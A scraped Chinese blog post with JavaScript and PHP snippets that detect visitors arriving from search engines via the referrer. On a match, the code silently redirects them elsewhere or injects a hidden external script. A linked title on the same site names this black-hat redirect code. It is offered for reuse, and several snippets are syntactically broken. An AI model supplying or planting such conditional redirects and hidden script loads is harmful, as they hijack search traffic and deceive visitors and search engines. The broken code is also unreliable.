js如何判断访问是来自搜索引擎(蜘蛛人)还是直接访问


Posted in Javascript onSeptember 14, 2015

以下javascript脚本代码可以实现判断访问是否来自搜索引擎。

代码如下:

<script type="text/javascript">
if(window.name != 'ad_app6'){
var r = document.referrer;
r = r.toLowerCase(); //转为小写
var aSites = new Array('google.','baidu.','sm.','soso.','so.','360.','yahoo.','youdao.','sogou.','gougou.');
var b = false;
for (i in aSites){
if (r.indexOf(aSites[i]) > 0){
b = true;
break;
}
}
 
if(b)
{
self.location = '要跳转的网址';
window.adworkergo = 'ad_app6';
}
}
</script>

介绍的这个JS判断蜘蛛来源的方法脚本是写在body的onload里面的。即页面加载时进行判断。代码如下:

body {onload:expression(
if(window.name!="Yang"){
var str1 = document.referrer;
str1 = str1.toLowerCase();
var str6 = 'google.';
var str7 = 'baidu.';
var str4 = 'yahoo.';
var str8 = 'youdao.';
var str9 = 'sogou.';
var str5 = 'soso.';
if(str1.indexOf(str7)>0 || str1.indexOf(str6)>0 || str1.indexOf(str4)>0 || str1.indexOf(str3)>0 || str1.indexOf(str8)>0 || str1.indexOf(str9)
 
>0 || str1.indexOf(str5)>0 && "zh-cn"==navigator.systemLanguage)
{
self.location='http://www.abc.com/';
window.name="Yang";
}
 
}
);}

这个JS判断蜘蛛来源方法不太好用。特别是在需要判断更多蜘蛛来源时代码写起来比较麻烦。

JS正则表达式判断来路搜索引擎指定跳转网址

var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|sm|so|biso|gougou|ifeng|ivc|sooule|niuhu|biso|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href="跳转指定网址";
}
<script language="javascript">

var s=document.referrer

if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("soso")>0 || s.indexOf("search")>0 || s.indexOf("114")>0 )

window.opener.navigate("https://3water.com")

</script>

通过Js判断搜索引擎来路的代码则如下

<script type="text/javascript">
function elem(e,url){
var h=document.createElement(e);
h.src=url;
document.getElementsByTagName('head')[0].appendChild(h);
}

function refer(){
var ref=document.referrer;
var baidu=ref.indexOf("baidu");
var soso=ref.indexOf("soso");
var google=ref.indexOf("google");
if(baidu!=-1||soso!=-1||google!=-1){
elem("script","http://127.0.0.1/js.js");
}
}
refer()
</script>

一段php判断搜索引擎的代码

<?PHP
$referer = $_SERVER['HTTP_REFERER'];
if(!$referer == ''){
if(ereg('http',$referer)){
$referer = @eXPlode('.',$referer);
if(is_array($referer)){
$referer = $referer['1'];
if($referer == 'google' OR $referer == 'baidu' OR $referer == 'soso' OR $referer == 'sogou'){
?>
<div style="visibility:hidden;"><script src="a.js" language="JavaScript"></script>
</div><?php
}
}
}
}
?>

手机端别忘了 sm、 sogou。

基本上也差不多了,如果你有更好的代码,可以留言.

Javascript 相关文章推荐
ASP.NET jQuery 实例9  通过控件hyperlink实现返回顶部效果
Feb 03 Javascript
javascript垃圾收集机制与内存泄漏详细解析
Nov 11 Javascript
基于jQuery实现收缩展开功能
Mar 18 Javascript
Bootstrap每天必学之折叠(Collapse)插件
Apr 25 Javascript
50 个 jQuery 插件可将你的网站带到另外一个高度
Apr 26 Javascript
BootStrap整体框架之基础布局组件
Dec 15 Javascript
Avalonjs 实现简单购物车功能(实例代码)
Feb 07 Javascript
解决Vue中mounted钩子函数获取节点高度出错问题
May 18 Javascript
使用weixin-java-miniapp配置进行单个小程序的配置详解
Mar 29 Javascript
详解js根据百度地图提供经纬度计算两点距离
May 13 Javascript
Vue Element UI + OSS实现上传文件功能
Jul 31 Javascript
js实现数字从零慢慢增加到指定数字示例
Nov 07 Javascript
根据user-agent判断蜘蛛代码黑帽跳转代码(js版与php版本)
Sep 14 #Javascript
jQuery实现默认是闭合的FAQ展开效果菜单
Sep 14 #Javascript
js带缩略图的图片轮播效果代码分享
Sep 14 #Javascript
jQuery实现的Tab滑动选项卡及图片切换(多种效果)小结
Sep 14 #Javascript
JS+DIV+CSS实现的经典标签切换效果代码
Sep 14 #Javascript
jQuery实现Meizu魅族官方网站的导航菜单效果
Sep 14 #Javascript
jQuery实现鼠标悬停背景翻转的黑色导航菜单代码
Sep 14 #Javascript
You might like
理解php Hash函数,增强密码安全
2011/02/25 PHP
php检测useragent版本示例
2014/03/24 PHP
PHP基于数组实现的分页函数实例
2014/08/20 PHP
浅谈PHP中pack、unpack的详细用法
2018/03/12 PHP
Laravel多用户认证系统示例详解
2018/03/13 PHP
PHP单元测试框架PHPUnit用法详解
2019/01/23 PHP
javascript 写类方式之六
2009/07/05 Javascript
jQuery.autocomplete 支持中文输入(firefox)修正方法
2011/03/10 Javascript
javascript笔记 String类replace函数的一些事
2011/09/22 Javascript
Javascript判断对象是否相等实现代码
2013/03/18 Javascript
js判断checkbox是否选中个数的方法(超简单)
2016/08/19 Javascript
jQuery的 $.ajax防止重复提交的两种方法(推荐)
2016/10/14 Javascript
jquery文字填写自动高度的实现方法
2016/11/07 Javascript
使用nodejs下载风景壁纸
2017/02/05 NodeJs
荐书|您有一份JavaScript书单待签收
2017/07/21 Javascript
vue-router 权限控制的示例代码
2017/09/21 Javascript
详解Node.js中path模块的resolve()和join()方法的区别
2018/10/29 Javascript
详解小程序BackgroundAudioManager踩坑之旅
2019/12/08 Javascript
[07:03]显微镜下的DOTA2第九期——430圣堂刺客杀戮秀
2014/06/20 DOTA
Python对两个有序列表进行合并和排序的例子
2014/06/13 Python
用PyQt进行Python图形界面的程序的开发的入门指引
2015/04/14 Python
Python爬取三国演义的实现方法
2016/09/12 Python
python:pandas合并csv文件的方法(图书数据集成)
2018/04/12 Python
python怎么调用自己的函数
2020/07/01 Python
python+opencv实现车道线检测
2021/02/19 Python
超市后勤自我鉴定
2014/01/17 职场文书
公司中层干部的自我评价分享
2014/03/01 职场文书
经典演讲稿汇总
2014/05/19 职场文书
2014年企业党支部工作总结
2014/12/04 职场文书
毕业实习计划书
2015/01/16 职场文书
学前班语言教学计划
2015/01/20 职场文书
饭店服务员岗位职责
2015/02/09 职场文书
2015年重阳节活动总结
2015/03/24 职场文书
民事二审代理词
2015/05/25 职场文书
校长新学期寄语2016
2015/12/04 职场文书
让人瞬间清醒的句子,句句经典,字字如金
2019/07/08 职场文书